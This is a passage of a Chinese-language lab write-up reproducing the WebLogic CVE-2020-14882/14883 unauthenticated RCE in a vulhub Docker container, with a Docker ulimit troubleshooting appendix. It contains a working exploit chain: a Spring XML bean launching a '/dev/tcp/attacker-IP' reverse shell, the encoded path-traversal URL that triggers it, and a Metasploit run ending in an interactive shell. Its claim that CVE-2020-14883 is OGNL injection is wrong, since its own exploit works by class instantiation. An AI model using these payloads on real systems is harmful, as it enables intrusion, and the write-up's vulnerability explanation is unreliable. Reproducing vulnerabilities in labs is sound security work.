WebLogic 未授权 RCE（CVE-2020-14882 & CVE-2020-14883）复现

可直接返回结果。

方法二

利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 类。

首先 systemctl start apache2 启动 apache2，在 /var/www/html 目录下构建一个 xml 文件：

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <value><![CDATA[bash -i >& /dev/tcp/attacker-IP/4444 0>&1]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

攻击机使用 nc -lvvp 4444 监听端口，访问如下网址：

http://target-IP:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://attacker-IP/rce.xml")

反弹 shell 成功。

方法三

使用 metasploit 直接反弹 shell，先查询是否有可用模块：

msfconsole
msf > search CVE-2020-14882
Matching Modules ================
# Name Disclosure Date Rank Check Description
0 exploit/multi/http/weblogic_admin_handle_rce 2020-10-20 excellent Yes Oracle WebLogic Server Administration Console Handle RCE

设置参数：

msf > use 0
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf exploit(multi/http/weblogic_admin_handle_rce) > set RHOST 192.168.31.148
RHOST => 192.168.31.148
msf exploit(multi/http/weblogic_admin_handle_rce) > set LHOST 192.168.31.152
LHOST => 192.168.31.152
msf exploit(multi/http/weblogic_admin_handle_rce) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/weblogic_admin_handle_rce) > set PAYLOAD linux/x64/meterpreter_reverse_https
PAYLOAD => linux/x64/meterpreter_reverse_https
msf exploit(multi/http/weblogic_admin_handle_rce) > set TARGET 1
TARGET => 1

使用 options 查看需要填写的参数，yes 为必填项，TARGETURI 可使用默认值，其余按需修改。

执行攻击后共生成了 23 条会话，使用 sessions 查看所有 session，使用 sessions -i [id] 选取其中任意一个：

msf exploit(multi/http/weblogic_admin_handle_rce) > run
[*] Started HTTPS reverse handler on https://192.168.31.152:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] https://192.168.31.152:4444 handling request from 192.168.31.148;(UUID: islcdvyp)
Attaching orphaned/stageless session...
[+] The target is vulnerable. Path traversal successful.
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://192.168.31.152:8080/bAY7yb
[*] Client 192.168.31.148 (curl/7.29.0) requested /bAY7yb
[*] Sending payload to 192.168.31.148 (curl/7.29.0)...
msf exploit(multi/http/weblogic_admin_handle_rce) > sessions -i 1
[*] Starting interaction with 1...

连接成功后不能直接执行 Linux 命令，需要使用 shell 切换到系统原生 Shell。此时是功能十分受限的非交互式 Shell，使用 python -c "import pty;pty.spawn ('/bin/bash')" 升级全交互式终端。

meterpreter > shell
Process 688 created. Channel 1 created.
python -c "import pty;pty.spawn ('/bin/bash')"
# 升级全交互式终端
[oracle@57c9304d2c9b base_domain]$ id
[oracle@57c9304d2c9b base_domain]$ uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)

至此反弹 shell 成功。

漏洞核心原理

CVE-2020-14882（未授权访问漏洞）

WebLogic 管理控制台（Console）的访问控制逻辑存在缺陷：

• 控制台的静态资源（如 CSS/JS）无需认证即可访问；
• 攻击者可构造路径遍历 + 编码绕过的 URL（如 console/css/%252e%252e%252fconsole.portal），将静态资源访问请求伪装成控制台核心页面请求，绕过认证直接进入后台管理界面。

CVE-2020-14883（OGNL 注入 RCE 漏洞）

WebLogic 控制台的 Diagnostic Framework 等功能模块存在OGNL 表达式注入漏洞：

• OGNL（Object-Graph Navigation Language）是 WebLogic 底层使用的表达式语言，支持动态执行代码；
• 未授权用户通过 14882 绕过认证后，可在控制台的特定参数中注入恶意 OGNL 表达式，WebLogic 解析执行该表达式，实现任意命令执行。

附录

容器启动失败解决方案

定位原因

执行 docker-compose up -d 后发现容器并没有按照预期正常启动，docker-compose logs 查看日志：

weblogic-1 | weblogic-1 | Oracle WebLogic Server Auto Generated Empty Domain: weblogic-1 | weblogic-1 | ----> 'weblogic' admin password: d7EzZmBp weblogic-1 | weblogic-1 | Initializing WebLogic Scripting Tool (WLST) ... weblogic-1 | weblogic-1 | library initialization failed - unable to allocate file descriptor table - out of memory/u01/oracle/oracle_common/common/bin/wlst_internal.sh: line 18: 72 Aborted (core dumped) "${JAVA_HOME}/bin/java" -DORACLE_HOME='/u01/oracle/oracle_common' -Djava.security.egd=file:/dev/./urandom weblogic.WLST "$@" <-- 内存不足（并非物理内存不足） weblogic-1 | /u01/oracle/createAndStartEmptyDomain.sh: line 64: /u01/oracle/user_projects/domains/base_domain/bin/setDomainEnv.sh: No such file or directory weblogic-1 | /u01/oracle/createAndStartEmptyDomain.sh: line 69: /u01/oracle/user_projects/domains/base_domain/startWebLogic.sh: No such file or directory weblogic-1 | touch: cannot touch '/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/logs/AdminServer.log': No such file or directory weblogic-1 | tail: cannot open '/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/logs/AdminServer.log' for reading: No such file or directory weblogic-1 | tail: no files remaining 

经过深入研究发现错误提示中的 out of memory 是内核误导性表述，并非物理内存不足（测试验证 2G 虚拟机也能正常启动）。

真实原因是 Docker 容器默认的 nofile（最大可打开文件描述符数）上限仅为 1024，而 WLST 初始化时需要加载大量配置文件、类库、网络连接，需创建远超 1024 的文件句柄，内核无法分配足够的文件描述符表，最终导致 WLST 进程崩溃（Aborted (core dumped)）。所以这个报错的本质是'文件描述符资源耗尽'，而非'内存不足'。

修复问题

修改 vulhub/weblogic/CVE-2020-14882/docker-compose.yml 为以下完整配置：

services:
  weblogic:
    image: vulhub/weblogic:12.2.1.3-2018
    ports:
      - "7001:7001"
    ulimits:
      nofile:
        soft: 65535
        hard: 65535

注意缩进，缩进错误可能会导致报错：

yaml:line 5: did not find expected '-' indicator 

Docker 全局永久修改方案：

编辑 Docker 的 daemon 配置文件 /etc/docker/daemon.json：

{"default-ulimits":{"nofile":{"Name":"nofile","Hard":65535,"Soft":65535}}, "registry-mirrors":["镜像地址"]}

重启 Docker 服务，让配置生效：

systemctl daemon-reload
systemctl restart docker